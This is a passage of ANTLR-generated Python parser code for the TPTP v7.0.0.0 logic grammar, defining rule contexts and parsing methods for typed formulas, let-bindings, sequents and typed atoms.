self.tff_variable()
self.state = 831
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 827
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 828
self.tff_variable()
self.state = 833
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_variableContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_typed_variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_typed_variableContext,0)
def variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.VariableContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_variable
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_variable" ):
listener.enterTff_variable(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_variable" ):
listener.exitTff_variable(self)
def tff_variable(self):
localctx = tptp_v7_0_0_0Parser.Tff_variableContext(self, self._ctx, self.state)
self.enterRule(localctx, 118, self.RULE_tff_variable)
try:
self.state = 836
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,42,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 834
self.tff_typed_variable()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 835
self.variable()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_typed_variableContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.VariableContext,0)
def tff_atomic_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_atomic_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_typed_variable
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_typed_variable" ):
listener.enterTff_typed_variable(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_typed_variable" ):
listener.exitTff_typed_variable(self)
def tff_typed_variable(self):
localctx = tptp_v7_0_0_0Parser.Tff_typed_variableContext(self, self._ctx, self.state)
self.enterRule(localctx, 120, self.RULE_tff_typed_variable)
try:
self.enterOuterAlt(localctx, 1)
self.state = 838
self.variable()
self.state = 839
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 840
self.tff_atomic_type()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_unary_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def unary_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Unary_connectiveContext,0)
def tff_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_unitary_formulaContext,0)
def fof_infix_unary(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_infix_unaryContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_unary_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_unary_formula" ):
listener.enterTff_unary_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_unary_formula" ):
listener.exitTff_unary_formula(self)
def tff_unary_formula(self):
localctx = tptp_v7_0_0_0Parser.Tff_unary_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 122, self.RULE_tff_unary_formula)
try:
self.state = 846
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Not]:
self.enterOuterAlt(localctx, 1)
self.state = 842
self.unary_connective()
self.state = 843
self.tff_unitary_formula()
pass
elif token in [tptp_v7_0_0_0Parser.T__17, tptp_v7_0_0_0Parser.T__18, tptp_v7_0_0_0Parser.T__23, tptp_v7_0_0_0Parser.T__24, tptp_v7_0_0_0Parser.T__25, tptp_v7_0_0_0Parser.Real, tptp_v7_0_0_0Parser.Rational, tptp_v7_0_0_0Parser.Integer, tptp_v7_0_0_0Parser.Dollar_word, tptp_v7_0_0_0Parser.Dollar_dollar_word, tptp_v7_0_0_0Parser.Upper_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted, tptp_v7_0_0_0Parser.Distinct_object]:
self.enterOuterAlt(localctx, 2)
self.state = 845
self.fof_infix_unary()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_atomic_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_atomic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_atomic_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_atomic_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_atomic_formula" ):
listener.enterTff_atomic_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_atomic_formula" ):
listener.exitTff_atomic_formula(self)
def tff_atomic_formula(self):
localctx = tptp_v7_0_0_0Parser.Tff_atomic_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 124, self.RULE_tff_atomic_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 848
self.fof_atomic_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_conditionalContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_logic_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tff_logic_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_logic_formulaContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_conditional
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_conditional" ):
listener.enterTff_conditional(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_conditional" ):
listener.exitTff_conditional(self)
def tff_conditional(self):
localctx = tptp_v7_0_0_0Parser.Tff_conditionalContext(self, self._ctx, self.state)
self.enterRule(localctx, 126, self.RULE_tff_conditional)
try:
self.enterOuterAlt(localctx, 1)
self.state = 850
self.match(tptp_v7_0_0_0Parser.T__20)
self.state = 851
self.tff_logic_formula()
self.state = 852
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 853
self.tff_logic_formula()
self.state = 854
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 855
self.tff_logic_formula()
self.state = 856
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_letContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_let_term_defns(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_term_defnsContext,0)
def tff_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_formulaContext,0)
def tff_let_formula_defns(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_formula_defnsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_let
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_let" ):
listener.enterTff_let(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_let" ):
listener.exitTff_let(self)
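    # Rule tff_let: two alternatives keyed on T__21 vs T__22 (most likely the '$let_tf(' and
    # '$let_ff(' openers), each parsing the defns, a T__1 separator, a tff_formula, and a closing T__10.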
def tff_let(self):
localctx = tptp_v7_0_0_0Parser.Tff_letContext(self, self._ctx, self.state)
self.enterRule(localctx, 128, self.RULE_tff_let)
try:
self.state = 870
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__21]:
self.enterOuterAlt(localctx, 1)
self.state = 858
self.match(tptp_v7_0_0_0Parser.T__21)
self.state = 859
self.tff_let_term_defns()
self.state = 860
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 861
self.tff_formula()
self.state = 862
self.match(tptp_v7_0_0_0Parser.T__10)
pass
elif token in [tptp_v7_0_0_0Parser.T__22]:
self.enterOuterAlt(localctx, 2)
self.state = 864
self.match(tptp_v7_0_0_0Parser.T__22)
self.state = 865
self.tff_let_formula_defns()
self.state = 866
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 867
self.tff_formula()
self.state = 868
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_let_term_defnsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_let_term_defn(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_term_defnContext,0)
def tff_let_term_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_term_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_let_term_defns
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_let_term_defns" ):
listener.enterTff_let_term_defns(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_let_term_defns" ):
listener.exitTff_let_term_defns(self)
def tff_let_term_defns(self):
localctx = tptp_v7_0_0_0Parser.Tff_let_term_defnsContext(self, self._ctx, self.state)
self.enterRule(localctx, 130, self.RULE_tff_let_term_defns)
try:
self.state = 877
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__9, tptp_v7_0_0_0Parser.Forall, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 872
self.tff_let_term_defn()
pass
elif token in [tptp_v7_0_0_0Parser.T__11]:
self.enterOuterAlt(localctx, 2)
self.state = 873
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 874
self.tff_let_term_list()
self.state = 875
self.match(tptp_v7_0_0_0Parser.T__12)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_let_term_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_let_term_defn(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tff_let_term_defnContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_term_defnContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_let_term_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_let_term_list" ):
listener.enterTff_let_term_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_let_term_list" ):
listener.exitTff_let_term_list(self)
def tff_let_term_list(self):
localctx = tptp_v7_0_0_0Parser.Tff_let_term_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 132, self.RULE_tff_let_term_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 879
self.tff_let_term_defn()
self.state = 884
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 880
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 881
self.tff_let_term_defn()
self.state = 886
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_let_term_defnContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Forall(self):
return self.getToken(tptp_v7_0_0_0Parser.Forall, 0)
def tff_variable_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_variable_listContext,0)
def tff_let_term_defn(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_term_defnContext,0)
def tff_let_term_binding(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_term_bindingContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_let_term_defn
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_let_term_defn" ):
listener.enterTff_let_term_defn(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_let_term_defn" ):
listener.exitTff_let_term_defn(self)
def tff_let_term_defn(self):
localctx = tptp_v7_0_0_0Parser.Tff_let_term_defnContext(self, self._ctx, self.state)
self.enterRule(localctx, 134, self.RULE_tff_let_term_defn)
try:
self.state = 895
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Forall]:
self.enterOuterAlt(localctx, 1)
self.state = 887
self.match(tptp_v7_0_0_0Parser.Forall)
self.state = 888
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 889
self.tff_variable_list()
self.state = 890
self.match(tptp_v7_0_0_0Parser.T__12)
self.state = 891
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 892
self.tff_let_term_defn()
pass
elif token in [tptp_v7_0_0_0Parser.T__9, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 2)
self.state = 894
self.tff_let_term_binding()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_let_term_bindingContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_plain_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_plain_termContext,0)
def Infix_equality(self):
return self.getToken(tptp_v7_0_0_0Parser.Infix_equality, 0)
def fof_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_termContext,0)
def tff_let_term_binding(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_term_bindingContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_let_term_binding
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_let_term_binding" ):
listener.enterTff_let_term_binding(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_let_term_binding" ):
listener.exitTff_let_term_binding(self)
def tff_let_term_binding(self):
localctx = tptp_v7_0_0_0Parser.Tff_let_term_bindingContext(self, self._ctx, self.state)
self.enterRule(localctx, 136, self.RULE_tff_let_term_binding)
try:
self.state = 905
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 897
self.fof_plain_term()
self.state = 898
self.match(tptp_v7_0_0_0Parser.Infix_equality)
self.state = 899
self.fof_term()
pass
elif token in [tptp_v7_0_0_0Parser.T__9]:
self.enterOuterAlt(localctx, 2)
self.state = 901
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 902
self.tff_let_term_binding()
self.state = 903
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_let_formula_defnsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_let_formula_defn(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_formula_defnContext,0)
def tff_let_formula_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_formula_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_let_formula_defns
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_let_formula_defns" ):
listener.enterTff_let_formula_defns(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_let_formula_defns" ):
listener.exitTff_let_formula_defns(self)
def tff_let_formula_defns(self):
localctx = tptp_v7_0_0_0Parser.Tff_let_formula_defnsContext(self, self._ctx, self.state)
self.enterRule(localctx, 138, self.RULE_tff_let_formula_defns)
try:
self.state = 912
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__9, tptp_v7_0_0_0Parser.Forall, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 907
self.tff_let_formula_defn()
pass
elif token in [tptp_v7_0_0_0Parser.T__11]:
self.enterOuterAlt(localctx, 2)
self.state = 908
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 909
self.tff_let_formula_list()
self.state = 910
self.match(tptp_v7_0_0_0Parser.T__12)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_let_formula_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_let_formula_defn(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tff_let_formula_defnContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_formula_defnContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_let_formula_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_let_formula_list" ):
listener.enterTff_let_formula_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_let_formula_list" ):
listener.exitTff_let_formula_list(self)
def tff_let_formula_list(self):
localctx = tptp_v7_0_0_0Parser.Tff_let_formula_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 140, self.RULE_tff_let_formula_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 914
self.tff_let_formula_defn()
self.state = 919
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 915
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 916
self.tff_let_formula_defn()
self.state = 921
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_let_formula_defnContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Forall(self):
return self.getToken(tptp_v7_0_0_0Parser.Forall, 0)
def tff_variable_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_variable_listContext,0)
def tff_let_formula_defn(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_formula_defnContext,0)
def tff_let_formula_binding(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_formula_bindingContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_let_formula_defn
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_let_formula_defn" ):
listener.enterTff_let_formula_defn(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_let_formula_defn" ):
listener.exitTff_let_formula_defn(self)
def tff_let_formula_defn(self):
localctx = tptp_v7_0_0_0Parser.Tff_let_formula_defnContext(self, self._ctx, self.state)
self.enterRule(localctx, 142, self.RULE_tff_let_formula_defn)
try:
self.state = 930
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Forall]:
self.enterOuterAlt(localctx, 1)
self.state = 922
self.match(tptp_v7_0_0_0Parser.Forall)
self.state = 923
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 924
self.tff_variable_list()
self.state = 925
self.match(tptp_v7_0_0_0Parser.T__12)
self.state = 926
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 927
self.tff_let_formula_defn()
pass
elif token in [tptp_v7_0_0_0Parser.T__9, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 2)
self.state = 929
self.tff_let_formula_binding()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_let_formula_bindingContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_plain_atomic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_plain_atomic_formulaContext,0)
def Iff(self):
return self.getToken(tptp_v7_0_0_0Parser.Iff, 0)
def tff_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_unitary_formulaContext,0)
def tff_let_formula_binding(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_formula_bindingContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_let_formula_binding
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_let_formula_binding" ):
listener.enterTff_let_formula_binding(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_let_formula_binding" ):
listener.exitTff_let_formula_binding(self)
def tff_let_formula_binding(self):
localctx = tptp_v7_0_0_0Parser.Tff_let_formula_bindingContext(self, self._ctx, self.state)
self.enterRule(localctx, 144, self.RULE_tff_let_formula_binding)
try:
self.state = 940
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 932
self.fof_plain_atomic_formula()
self.state = 933
self.match(tptp_v7_0_0_0Parser.Iff)
self.state = 934
self.tff_unitary_formula()
pass
elif token in [tptp_v7_0_0_0Parser.T__9]:
self.enterOuterAlt(localctx, 2)
self.state = 936
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 937
self.tff_let_formula_binding()
self.state = 938
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_sequentContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_formula_tuple(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tff_formula_tupleContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_formula_tupleContext,i)
def Gentzen_arrow(self):
return self.getToken(tptp_v7_0_0_0Parser.Gentzen_arrow, 0)
def tff_sequent(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_sequentContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_sequent
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_sequent" ):
listener.enterTff_sequent(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_sequent" ):
listener.exitTff_sequent(self)
def tff_sequent(self):
localctx = tptp_v7_0_0_0Parser.Tff_sequentContext(self, self._ctx, self.state)
self.enterRule(localctx, 146, self.RULE_tff_sequent)
try:
self.state = 950
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__11, tptp_v7_0_0_0Parser.T__16]:
self.enterOuterAlt(localctx, 1)
self.state = 942
self.tff_formula_tuple()
self.state = 943
self.match(tptp_v7_0_0_0Parser.Gentzen_arrow)
self.state = 944
self.tff_formula_tuple()
pass
elif token in [tptp_v7_0_0_0Parser.T__9]:
self.enterOuterAlt(localctx, 2)
self.state = 946
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 947
self.tff_sequent()
self.state = 948
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_formula_tupleContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_formula_tuple_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_formula_tuple_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_formula_tuple
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_formula_tuple" ):
listener.enterTff_formula_tuple(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_formula_tuple" ):
listener.exitTff_formula_tuple(self)
def tff_formula_tuple(self):
localctx = tptp_v7_0_0_0Parser.Tff_formula_tupleContext(self, self._ctx, self.state)
self.enterRule(localctx, 148, self.RULE_tff_formula_tuple)
try:
self.state = 957
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__16]:
self.enterOuterAlt(localctx, 1)
self.state = 952
self.match(tptp_v7_0_0_0Parser.T__16)
pass
elif token in [tptp_v7_0_0_0Parser.T__11]:
self.enterOuterAlt(localctx, 2)
self.state = 953
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 954
self.tff_formula_tuple_list()
self.state = 955
self.match(tptp_v7_0_0_0Parser.T__12)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_formula_tuple_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_logic_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tff_logic_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_logic_formulaContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_formula_tuple_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_formula_tuple_list" ):
listener.enterTff_formula_tuple_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_formula_tuple_list" ):
listener.exitTff_formula_tuple_list(self)
def tff_formula_tuple_list(self):
localctx = tptp_v7_0_0_0Parser.Tff_formula_tuple_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 150, self.RULE_tff_formula_tuple_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 959
self.tff_logic_formula()
self.state = 964
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 960
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 961
self.tff_logic_formula()
self.state = 966
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_typed_atomContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def untyped_atom(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Untyped_atomContext,0)
def tff_top_level_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_top_level_typeContext,0)
def tff_typed_atom(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_typed_atomContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_typed_atom
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_typed_atom" ):
listener.enterTff_typed_atom(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_typed_atom" ):
listener.exitTff_typed_atom(self)
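    # Rule tff_typed_atom: untyped_atom T__13 tff_top_level_type (T__13 most likely ':'),
    # or a tff_typed_atom wrapped in T__9/T__10 (most likely parentheses).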
def tff_typed_atom(self):
localctx = tptp_v7_0_0_0Parser.Tff_typed_atomContext(self, self._ctx, self.state)
self.enterRule(localctx, 152, self.RULE_tff_typed_atom)
try:
self.state = 975
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Dollar_dollar_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
